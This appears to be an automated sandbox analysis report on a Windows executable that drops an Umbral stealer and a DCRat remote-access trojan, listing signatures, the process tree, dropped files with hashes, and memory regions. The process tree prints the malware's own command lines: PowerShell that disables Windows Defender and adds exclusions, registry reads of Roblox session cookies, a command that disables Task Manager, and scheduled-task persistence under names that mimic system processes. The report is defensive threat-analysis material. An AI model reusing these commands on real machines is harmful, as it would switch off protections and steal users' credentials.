Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-05-2024 19:11

General

  • Target

    898A94F29EDC228CE3BD2054F3D5D6DD.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal (DC) is a .NET RAT active since June 2019 that is capable of loading additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 21 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings and add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 21 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe
    "C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4712
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:4408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3836
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:2968
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:3564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4000
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:3744
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:916
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:2632
    • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
      "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4664
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:548
          • C:\MsWinsessiondllNet\driverBrokercommon.exe
            "C:\MsWinsessiondllNet\driverBrokercommon.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1548
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                PID:740
              • C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
                "C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of WriteProcessMemory
                PID:2020
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"
                  8⤵
                  PID:2996
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"
                  8⤵
                  PID:4048
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            5⤵
            • Modifies registry key
            PID:4344
    • C:\Users\Admin\AppData\Local\Temp\Inject.exe
      "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
      2⤵
      • Executes dropped EXE
      PID:4132
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3772
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3740
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3964
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2780
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2700
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4016
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4144
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:436
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4208
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1580
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3212
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1004
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1676
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2584
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4996
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4752
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2168
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4416
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4744
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2588
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3616

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\MsWinsessiondllNet\driverBrokercommon.exe

    Filesize

    2.3MB

    MD5

    d84e590c3715c79dc5b92c435957d162

    SHA1

    2901580903e4b356448d9fe7bea510261e655363

    SHA256

    d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

    SHA512

    b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

  • C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

    Filesize

    158B

    MD5

    ea70d7b0f1a8a1ff2d246efbdcfe1001

    SHA1

    252e762aee8fcc5761e17bb84aa3af8276852f5c

    SHA256

    1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

    SHA512

    1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

  • C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

    Filesize

    218B

    MD5

    7c9bb5fda146efee5ee4a243d6e404b0

    SHA1

    c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

    SHA256

    1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

    SHA512

    797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    948B

    MD5

    5824a6037c081fda5d46de274b6e2799

    SHA1

    526367a09300cbde430e8fb44e41cbe7a0937aac

    SHA256

    4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

    SHA512

    a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    276798eeb29a49dc6e199768bc9c2e71

    SHA1

    5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

    SHA256

    cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

    SHA512

    0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    288f76eb6350b99897bf8a40a26d7b88

    SHA1

    7f386d05202de2cf090bbda84d633a640730e090

    SHA256

    1b9a2714ecfaf4b2e7d7961d5f2537ea360ad0df46a0fa789255235b077075d1

    SHA512

    ffafc9d47140408afba98a9832433c0829ba696524c56d03f4ce67ae84d369c658d3a0b3cbfc62f8e5d83fc91f8f73fc1dd9a27f0deaefd1d07485a63face869

  • C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs

    Filesize

    731B

    MD5

    618a9a810ab07f4b89dac17b4d779106

    SHA1

    38000ba42ac18b44659eeddd29f143c707fabc18

    SHA256

    525376b2e27972300d6b4fe9337f74dcf1eb136fa01af29dfd80abdabb521b68

    SHA512

    beafc7bd11f38f33532819b50af7d67649937b74c565dbc28e273e02df2868bc473b12094022ebbe9c5d656c6d672c3db8892e887d663c65431bcedad9294f6a

  • C:\Users\Admin\AppData\Local\Temp\Inject.exe

    Filesize

    75KB

    MD5

    d428ddd1b0ce85a6c96765aeaf246320

    SHA1

    d100efdaab5b2ad851fe75a28d0aa95deb920926

    SHA256

    453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb

    SHA512

    3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgzpw44y.q30.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs

    Filesize

    507B

    MD5

    67bcd6c3b47d72ab5e378e01c1450c0e

    SHA1

    738cacda8b69315f2e60611b32b373031176b333

    SHA256

    41ae76ac5a06b9166919e942b253ffb6b1cdfec9a47622ac8518c7e6306df7ab

    SHA512

    57246abd561e751572fca5065bf7c1f38275e689c00b7ca0f12f384bc7e2b24808f7654788b317c028d351089eb0229943a53f98004152271ce5fa3046bfebf7

  • C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat

    Filesize

    220B

    MD5

    27939e6ce9f09d94c026b20380a2905b

    SHA1

    bfa71a6eb344b183b7664f7f7627df0594c6da7e

    SHA256

    219a544ce956cfd600a42229c855784f3fc2a02a0b65ac5291e314b3f43c0436

    SHA512

    a5415e947a363bc50a37b0a5a5bd7fefe39e3d09d10761ffdf749efd11fbcf9330ac0ce1c57efd769c2120cbc10429c911963a225ea08d480582fb054e8f9850

  • C:\Users\Admin\AppData\Local\Temp\stealer.exe

    Filesize

    229KB

    MD5

    8cc1e7cf94fec9bc505ce7411aa28861

    SHA1

    08703de84f3db427c368f16c873664d78bd83264

    SHA256

    cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba

    SHA512

    fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

  • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

    Filesize

    2.6MB

    MD5

    6216b6bef94c09a40bfa263809b1ae56

    SHA1

    a928120e65199c6aaae6c991aa0466f3f8b06020

    SHA256

    eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b

    SHA512

    0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

  • memory/1548-228-0x000000001B080000-0x000000001B08C000-memory.dmp

    Filesize

    48KB

  • memory/1548-232-0x000000001B0C0000-0x000000001B0C8000-memory.dmp

    Filesize

    32KB

  • memory/1548-234-0x000000001B0E0000-0x000000001B0EC000-memory.dmp

    Filesize

    48KB

  • memory/1548-233-0x000000001B0D0000-0x000000001B0DA000-memory.dmp

    Filesize

    40KB

  • memory/1548-231-0x000000001B0B0000-0x000000001B0BE000-memory.dmp

    Filesize

    56KB

  • memory/1548-230-0x000000001B0A0000-0x000000001B0AA000-memory.dmp

    Filesize

    40KB

  • memory/1548-229-0x000000001B090000-0x000000001B098000-memory.dmp

    Filesize

    32KB

  • memory/1548-227-0x000000001B070000-0x000000001B07C000-memory.dmp

    Filesize

    48KB

  • memory/1548-220-0x0000000000290000-0x00000000004DA000-memory.dmp

    Filesize

    2.3MB

  • memory/1548-223-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

  • memory/1548-222-0x00000000026E0000-0x00000000026E8000-memory.dmp

    Filesize

    32KB

  • memory/1548-224-0x0000000002820000-0x0000000002830000-memory.dmp

    Filesize

    64KB

  • memory/1548-225-0x0000000002830000-0x0000000002886000-memory.dmp

    Filesize

    344KB

  • memory/1548-226-0x0000000002880000-0x000000000288C000-memory.dmp

    Filesize

    48KB

  • memory/1956-201-0x0000025EB51D0000-0x0000025EB51DA000-memory.dmp

    Filesize

    40KB

  • memory/1956-163-0x0000025ECDB40000-0x0000025ECDBB6000-memory.dmp

    Filesize

    472KB

  • memory/1956-202-0x0000025ECDBC0000-0x0000025ECDBD2000-memory.dmp

    Filesize

    72KB

  • memory/1956-165-0x0000025EB5180000-0x0000025EB519E000-memory.dmp

    Filesize

    120KB

  • memory/1956-164-0x0000025ECDC20000-0x0000025ECDC70000-memory.dmp

    Filesize

    320KB

  • memory/1956-126-0x00007FF920780000-0x00007FF921241000-memory.dmp

    Filesize

    10.8MB

  • memory/1956-258-0x0000025ECDC70000-0x0000025ECDE19000-memory.dmp

    Filesize

    1.7MB

  • memory/1956-259-0x00007FF920780000-0x00007FF921241000-memory.dmp

    Filesize

    10.8MB

  • memory/1956-83-0x0000025EB33F0000-0x0000025EB3430000-memory.dmp

    Filesize

    256KB

  • memory/1956-62-0x00007FF920783000-0x00007FF920785000-memory.dmp

    Filesize

    8KB

  • memory/2700-143-0x000002795A960000-0x000002795A982000-memory.dmp

    Filesize

    136KB

  • memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp

    Filesize

    4.3MB

  • memory/4132-127-0x00007FF61B710000-0x00007FF61B73A000-memory.dmp

    Filesize

    168KB